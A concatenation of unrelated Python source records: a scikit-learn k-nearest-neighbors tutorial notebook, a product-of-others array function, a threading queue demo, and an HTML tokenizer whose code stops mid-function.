aim_rotation_speed = 90.0
turret_rotation_speed = 25.0
aim_angle_range = {'min': -60, 'max': 60}
turret_cool_down_duration = 1.5
enemy_mass = 10.0
bullet_velocity = 5.0
max_debris = 256 |
py | b414d10e061b26808267ccd53cb3bbe93d5758ad | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.6.0
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# # First model with scikit-learn
#
# In this notebook, we present how to build predictive models on tabular
# datasets, with only numerical features.
#
# In particular we will highlight:
#
# * the scikit-learn API: `.fit(X, y)`/`.predict(X)`/`.score(X, y)`;
# * how to evaluate the generalization performance of a model with a train-test
# split.
#
# ## Loading the dataset with Pandas
#
# We will use the same dataset "adult_census" described in the previous
# notebook. For more details about the dataset see
# <http://www.openml.org/d/1590>.
#
# Numerical data is the most natural type of data used in machine learning and
# can (almost) directly be fed into predictive models. We will load a
# subset of the original data with only the numerical columns.
# %%
import pandas as pd
adult_census = pd.read_csv("../datasets/adult-census-numeric.csv")
# %% [markdown]
# Let's have a look at the first records of this dataframe:
# %%
adult_census.head()
# %% [markdown]
# We see that this CSV file contains all information: the target that we would
# like to predict (i.e. `"class"`) and the data that we want to use to train
# our predictive model (i.e. the remaining columns). The first step is to
# separate columns to get on one side the target and on the other side the
# data.
#
# ## Separate the data and the target
# %%
target_name = "class"
target = adult_census[target_name]
target
# %%
data = adult_census.drop(columns=[target_name, ])
data.head()
# %% [markdown]
# We can now focus on the variables, also called features, that we will use
# to build our predictive model. In addition, we can check how many samples
# are available in our dataset.
# %%
data.columns
# %%
print(f"The dataset contains {data.shape[0]} samples and "
f"{data.shape[1]} features")
# %% [markdown]
# ## Fit a model and make predictions
#
# We will build a classification model using the "K-nearest neighbors"
# strategy. To predict the target of a new sample, a k-nearest neighbors takes
# into account its `k` closest samples in the training set and predicts the
# majority target of these samples.
#
# ```{caution}
# We use a K-nearest neighbors here. However, be aware that it is seldom useful
# in practice. We use it because it is an intuitive algorithm. In the next
# notebook, we will introduce better models.
# ```
#
# The `fit` method is called to train the model from the input (features) and
# target data.
# %%
# to display nice model diagram
from sklearn import set_config
set_config(display='diagram')
# %%
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier()
model.fit(data, target)
# %% [markdown]
# Learning can be represented as follows:
#
# 
#
# The method `fit` is composed of two elements: (i) a **learning algorithm**
# and (ii) some **model states**. The learning algorithm takes the training
# data and training target as input and sets the model states. These model
# states will be used later to either predict (for classifiers and regressors)
# or transform data (for transformers).
#
# Both the learning algorithm and the type of model states are specific to each
# type of model.
# %% [markdown]
# ```{note}
# Here and later, we use the name `data` and `target` to be explicit. In
# scikit-learn documentation, `data` is commonly named `X` and `target` is
# commonly called `y`.
# ```
# %% [markdown]
# Let's use our model to make some predictions using the same dataset.
# %%
target_predicted = model.predict(data)
# %% [markdown]
# We can illustrate the prediction mechanism as follows:
#
# 
#
# To predict, a model uses a **prediction function** that will use the input
# data together with the model states. As for the learning algorithm and the
# model states, the prediction function is specific for each type of model.
# %% [markdown]
# Let's now have a look at the computed predictions. For the sake of
# simplicity, we will look at the first five predicted targets.
# %%
target_predicted[:5]
# %% [markdown]
# Indeed, we can compare these predictions to the actual data...
# %%
target[:5]
# %% [markdown]
# ...and we could even check if the predictions agree with the real targets:
# %%
target[:5] == target_predicted[:5]
# %%
print(f"Number of correct prediction: "
f"{(target[:5] == target_predicted[:5]).sum()} / 5")
# %% [markdown]
# Here, we see that our model makes a mistake when predicting for the first
# sample.
#
# To get a better assessment, we can compute the average success rate.
# %%
(target == target_predicted).mean()
# %% [markdown]
# But, can this evaluation be trusted, or is it too good to be true?
#
# ## Train-test data split
#
# When building a machine learning model, it is important to evaluate the
# trained model on data that was not used to fit it, as **generalization** is
# more than memorization (meaning we want a rule that generalizes to new data,
# without comparing to data we memorized).
# It is harder to conclude on never-seen instances than on already seen ones.
#
# Correct evaluation is easily done by leaving out a subset of the data when
# training the model and using it afterwards for model evaluation.
# The data used to fit a model is called training data while the data used to
# assess a model is called testing data.
#
# We can load more data, which was actually left out of the original
# dataset.
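# %% [markdown]
# ```{note}
# When no dedicated test file is available, an equivalent split can be created
# from a single dataframe with `sklearn.model_selection.train_test_split`. The
# next cell is only an illustrative sketch on the data loaded earlier; the rest
# of this notebook keeps using the dedicated test file.
# ```
# %%
# Illustrative sketch: hold out 25% of the rows as a test set.
from sklearn.model_selection import train_test_split
data_train, data_holdout, target_train, target_holdout = train_test_split(
    data, target, test_size=0.25, random_state=42)
print(f"{data_train.shape[0]} training and {data_holdout.shape[0]} testing samples")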
# %%
adult_census_test = pd.read_csv('../datasets/adult-census-numeric-test.csv')
# %% [markdown]
# From this new data, we separate our input features and the target to predict,
# as in the beginning of this notebook.
# %%
target_test = adult_census_test[target_name]
data_test = adult_census_test.drop(columns=[target_name, ])
# %% [markdown]
# We can check the number of features and samples available in this new set.
# %%
print(f"The testing dataset contains {data_test.shape[0]} samples and "
f"{data_test.shape[1]} features")
# %% [markdown]
#
# Instead of computing the predictions and manually computing the average
# success rate, we can use the method `score`. For classifiers, this method
# returns their default performance metric, which is the accuracy.
# %%
accuracy = model.score(data_test, target_test)
model_name = model.__class__.__name__
print(f"The test accuracy using a {model_name} is "
f"{accuracy:.3f}")
# %% [markdown]
# Let's check the underlying mechanism when the `score` method is called:
#
# 
#
# To compute the score, the predictor first computes the predictions (using
# the `predict` method) and then uses a scoring function to compare the
# true target `y` and the predictions. Finally, the score is returned.
# %% [markdown]
# If we compare with the accuracy obtained by wrongly evaluating the model
# on the training set, we find that this evaluation was indeed optimistic
# compared to the score obtained on a held-out test set.
#
# It shows the importance of always testing the generalization performance of
# predictive models on a different set than the one used to train them.
# We will discuss later in more details how predictive models should be
# evaluated.
# %% [markdown]
# ```{note}
# In this MOOC, we will refer to **generalization performance** of a model when
# referring to the test score or test error obtained by comparing the
# prediction of a model and the true targets. Equivalent terms for
# **generalization performance** are predictive performance and statistical
# performance. We will refer to the **computational performance** of a
# predictive model when assessing the computational costs of training a
# predictive model or using it to make predictions.
# ```
# %% [markdown]
# In this notebook we:
#
# * fitted a **k-nearest neighbors** model on a training dataset;
# * evaluated its generalization performance on the testing data;
# * introduced the scikit-learn API `.fit(X, y)` (to train a model),
# `.predict(X)` (to make predictions) and `.score(X, y)`
# (to evaluate a model).
|
py | b414d12d23e39188311cfba85ae29ae69ed873b6 | def calc_products_of_all_others(arr: list[int]) -> list[int]:
"""Calculate a new array with each entry at index i is a product of all numbers in the original array except the one at i."""
if arr is None: raise TypeError("'None' is not allowed for input")
backward_products = [1]*len(arr)
for i in range(len(arr)-1 , 0, -1):
backward_products[i-1] = backward_products[i] * arr[i]
products_of_all_others = [1]*len(arr)
forward_product = 1
for i in range(0, len(arr)):
products_of_all_others[i] = backward_products[i]*forward_product;
forward_product *= arr[i];
return products_of_all_others
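# Minimal usage sketch (illustrative, not part of the original module):
if __name__ == "__main__":
    # For [1, 2, 3, 4] the expected result is [2*3*4, 1*3*4, 1*2*4, 1*2*3].
    print(calc_products_of_all_others([1, 2, 3, 4]))  # [24, 12, 8, 6]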
|
py | b414d12f5bc20531a3992665edcce4d456c94eed | # https://www.youtube.com/watch?v=NwH0HvMI4EA
import threading
from queue import Queue
import time
print_lock = threading.Lock()
# Queue that will be shared across threads.
q = Queue()
def thread_body():
while True:
# This is blocking - until an element won't appear in the queue.
work_to_be_done = q.get()
time.sleep(0.5)
with print_lock:
print("Thread {}: realized {}".format(threading.current_thread().name, work_to_be_done))
# Inform queue that the task is done! (so join will proceed when all tasks will be finished!)
q.task_done()
# Create threads working in the background - daemons.
for x in range(10):
t = threading.Thread(target=thread_body)
    # Daemon threads stop along with the main thread.
t.daemon = True
t.start()
start = time.time()
# Add "work" to be done.
for work_to_be_done in range(20):
q.put(work_to_be_done)
# Wait until all tasks will be finished.
q.join()
print("Entire job took:", time.time() - start)
|
py | b414d1521f61ba5e72c8826b338b54c5a929175d | from __future__ import absolute_import, division, unicode_literals
try:
chr = unichr # flake8: noqa
except NameError:
pass
from collections import deque
from .constants import spaceCharacters
from .constants import entities
from .constants import asciiLetters, asciiUpper2Lower
from .constants import digits, hexDigits, EOF
from .constants import tokenTypes, tagTokenTypes
from .constants import replacementCharacters
from .inputstream import HTMLInputStream
from .trie import Trie
entitiesTrie = Trie(entities)
class HTMLTokenizer(object):
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.stream
Points to HTMLInputStream object.
"""
def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
lowercaseElementName=True, lowercaseAttrName=True, parser=None):
self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet)
self.parser = parser
# Perform case conversions?
self.lowercaseElementName = lowercaseElementName
self.lowercaseAttrName = lowercaseAttrName
# Setup the initial tokenizer state
self.escapeFlag = False
self.lastFourChars = []
self.state = self.dataState
self.escape = False
# The current token being created
self.currentToken = None
super(HTMLTokenizer, self).__init__()
def __iter__(self):
""" This is where the magic happens.
We do our usually processing through the states and when we have a token
to return we yield the token which pauses processing until the next token
is requested.
"""
self.tokenQueue = deque([])
# Start processing. When EOF is reached self.state will return False
# instead of True and the loop will terminate.
while self.state():
while self.stream.errors:
yield {'type': tokenTypes['ParseError'], 'data': self.stream.errors.pop(0)}
while self.tokenQueue:
yield self.tokenQueue.popleft()
def consumeNumberEntity(self, isHex):
"""This function returns either U+FFFD or the character based on the
decimal or hexadecimal representation. It also discards ";" if present.
If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
"""
allowed = digits
radix = 10
if isHex:
allowed = hexDigits
radix = 16
charStack = []
# Consume all the characters that are in range while making sure we
# don't hit an EOF.
c = self.stream.char()
while c in allowed and c is not EOF:
charStack.append(c)
c = self.stream.char()
# Convert the set of characters consumed to an int.
charAsInt = int(''.join(charStack), radix)
# Certain characters get replaced with others
if charAsInt in replacementCharacters:
char = replacementCharacters[charAsInt]
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'illegal-codepoint-for-numeric-entity',
'datavars': {'charAsInt': charAsInt}})
elif ((0xD800 <= charAsInt <= 0xDFFF) or
(charAsInt > 0x10FFFF)):
char = '\uFFFD'
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'illegal-codepoint-for-numeric-entity',
'datavars': {'charAsInt': charAsInt}})
else:
# Should speed up this check somehow (e.g. move the set to a constant)
if ((0x0001 <= charAsInt <= 0x0008) or
(0x000E <= charAsInt <= 0x001F) or
(0x007F <= charAsInt <= 0x009F) or
(0xFDD0 <= charAsInt <= 0xFDEF) or
charAsInt in frozenset([0x000B, 0xFFFE, 0xFFFF, 0x1FFFE,
0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE,
0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE,
0x7FFFF, 0x8FFFE, 0x8FFFF, 0x9FFFE,
0x9FFFF, 0xAFFFE, 0xAFFFF, 0xBFFFE,
0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE,
0xFFFFF, 0x10FFFE, 0x10FFFF])):
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data':
'illegal-codepoint-for-numeric-entity',
'datavars': {'charAsInt': charAsInt}})
try:
# Try/except needed as UCS-2 Python builds' unichar only works
# within the BMP.
char = chr(charAsInt)
except ValueError:
v = charAsInt - 0x10000
char = chr(0xD800 | (v >> 10)) + chr(0xDC00 | (v & 0x3FF))
# Discard the ; if present. Otherwise, put it back on the queue and
# invoke parseError on parser.
if c != ';':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'numeric-entity-without-semicolon'})
self.stream.unget(c)
return char
def consumeEntity(self, allowedChar=None, fromAttribute=False):
# Initialise to the default output for when no entity is matched
output = '&'
charStack = [self.stream.char()]
if (charStack[0] in spaceCharacters or charStack[0] in (EOF, '<', '&')
or (allowedChar is not None and allowedChar == charStack[0])):
self.stream.unget(charStack[0])
elif charStack[0] == '#':
# Read the next character to see if it's hex or decimal
hex = False
charStack.append(self.stream.char())
if charStack[-1] in ('x', 'X'):
hex = True
charStack.append(self.stream.char())
# charStack[-1] should be the first digit
if (hex and charStack[-1] in hexDigits) \
or (not hex and charStack[-1] in digits):
# At least one digit found, so consume the whole number
self.stream.unget(charStack[-1])
output = self.consumeNumberEntity(hex)
else:
# No digits found
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'expected-numeric-entity'})
self.stream.unget(charStack.pop())
output = '&' + ''.join(charStack)
else:
            # At this point in the process we might have a named entity. Entities
            # are stored in the global variable "entities".
#
            # Consume characters and compare these to a substring of the
            # entity names in the list until the substring no longer matches.
while (charStack[-1] is not EOF):
if not entitiesTrie.has_keys_with_prefix(''.join(charStack)):
break
charStack.append(self.stream.char())
# At this point we have a string that starts with some characters
# that may match an entity
# Try to find the longest entity the string will match to take care
# of ¬i for instance.
try:
entityName = entitiesTrie.longest_prefix(''.join(charStack[:-1]))
entityLength = len(entityName)
except KeyError:
entityName = None
if entityName is not None:
if entityName[-1] != ';':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'named-entity-without-semicolon'})
if (entityName[-1] != ';' and fromAttribute and
(charStack[entityLength] in asciiLetters or
charStack[entityLength] in digits or
charStack[entityLength] == '=')):
self.stream.unget(charStack.pop())
output = '&' + ''.join(charStack)
else:
output = entities[entityName]
self.stream.unget(charStack.pop())
output += ''.join(charStack[entityLength:])
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-named-entity'})
self.stream.unget(charStack.pop())
output = '&' + ''.join(charStack)
if fromAttribute:
self.currentToken['data'][-1][1] += output
else:
if output in spaceCharacters:
tokenType = 'SpaceCharacters'
else:
tokenType = 'Characters'
self.tokenQueue.append({'type': tokenTypes[tokenType], 'data': output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token['type'] in tagTokenTypes):
if self.lowercaseElementName:
token['name'] = token['name'].translate(asciiUpper2Lower)
if token['type'] == tokenTypes['EndTag']:
if token['data']:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'attributes-in-end-tag'})
if token['selfClosing']:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'self-closing-flag-on-end-tag'})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
def dataState(self):
data = self.stream.char()
if data == '&':
self.state = self.entityDataState
elif data == '<':
self.state = self.tagOpenState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\u0000'})
elif data is EOF:
# Tokenization ends.
return False
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({'type': tokenTypes['SpaceCharacters'], 'data':
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(('&', '<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def entityDataState(self):
self.consumeEntity()
self.state = self.dataState
return True
def rcdataState(self):
data = self.stream.char()
if data == '&':
self.state = self.characterReferenceInRcdata
elif data == '<':
self.state = self.rcdataLessThanSignState
elif data == EOF:
# Tokenization ends.
return False
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({'type': tokenTypes['SpaceCharacters'], 'data':
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(('&', '<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def characterReferenceInRcdata(self):
self.consumeEntity()
self.state = self.rcdataState
return True
def rawtextState(self):
data = self.stream.char()
if data == '<':
self.state = self.rawtextLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(('<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def scriptDataState(self):
data = self.stream.char()
if data == '<':
self.state = self.scriptDataLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(('<', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def plaintextState(self):
data = self.stream.char()
if data == EOF:
# Tokenization ends.
return False
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + self.stream.charsUntil('\u0000')})
return True
def tagOpenState(self):
data = self.stream.char()
if data == '!':
self.state = self.markupDeclarationOpenState
elif data == '/':
self.state = self.closeTagOpenState
elif data in asciiLetters:
self.currentToken = {'type': tokenTypes['StartTag'],
'name': data, 'data': [],
'selfClosing': False,
'selfClosingAcknowledged': False}
self.state = self.tagNameState
elif data == '>':
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-tag-name-but-got-right-bracket'})
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<>'})
self.state = self.dataState
elif data == '?':
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-tag-name-but-got-question-mark'})
self.stream.unget(data)
self.state = self.bogusCommentState
else:
# XXX
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-tag-name'})
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.dataState
return True
def closeTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {'type': tokenTypes['EndTag'], 'name': data,
'data': [], 'selfClosing': False}
self.state = self.tagNameState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-closing-tag-but-got-right-bracket'})
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-closing-tag-but-got-eof'})
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.state = self.dataState
else:
# XXX data can be _'_...
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-closing-tag-but-got-char',
'datavars': {'data': data}})
self.stream.unget(data)
self.state = self.bogusCommentState
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == '>':
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-tag-name'})
self.state = self.dataState
elif data == '/':
self.state = self.selfClosingStartTagState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['name'] += '\uFFFD'
else:
self.currentToken['name'] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
def rcdataLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.rcdataEndTagOpenState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rcdataEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rawtextLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.rawtextEndTagOpenState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rawtextEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rawtextState
return True
def scriptDataLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.scriptDataEndTagOpenState
elif data == '!':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<!'})
self.state = self.scriptDataEscapeStartState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.scriptDataEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapeStartDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapedDashDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapedState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapedDashState
elif data == '<':
self.state = self.scriptDataEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
self.state = self.dataState
else:
chars = self.stream.charsUntil(('<', '-', '\u0000'))
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data':
data + chars})
return True
def scriptDataEscapedDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataEscapedDashDashState
elif data == '<':
self.state = self.scriptDataEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedDashDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
elif data == '<':
self.state = self.scriptDataEscapedLessThanSignState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '>'})
self.state = self.scriptDataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.temporaryBuffer = ''
self.state = self.scriptDataEscapedEndTagOpenState
elif data in asciiLetters:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<' + data})
self.temporaryBuffer = data
self.state = self.scriptDataDoubleEscapeStartState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer = data
self.state = self.scriptDataEscapedEndTagNameState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '</'})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagNameState(self):
appropriate = self.currentToken and self.currentToken['name'].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.beforeAttributeNameState
elif data == '/' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.state = self.selfClosingStartTagState
elif data == '>' and appropriate:
self.currentToken = {'type': tokenTypes['EndTag'],
'name': self.temporaryBuffer,
'data': [], 'selfClosing': False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '</' + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapeStartState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(('/', '>'))):
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
if self.temporaryBuffer.lower() == 'script':
self.state = self.scriptDataDoubleEscapedState
else:
self.state = self.scriptDataEscapedState
elif data in asciiLetters:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapedState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataDoubleEscapedDashState
elif data == '<':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
elif data == EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-script-in-script'})
self.state = self.dataState
else:
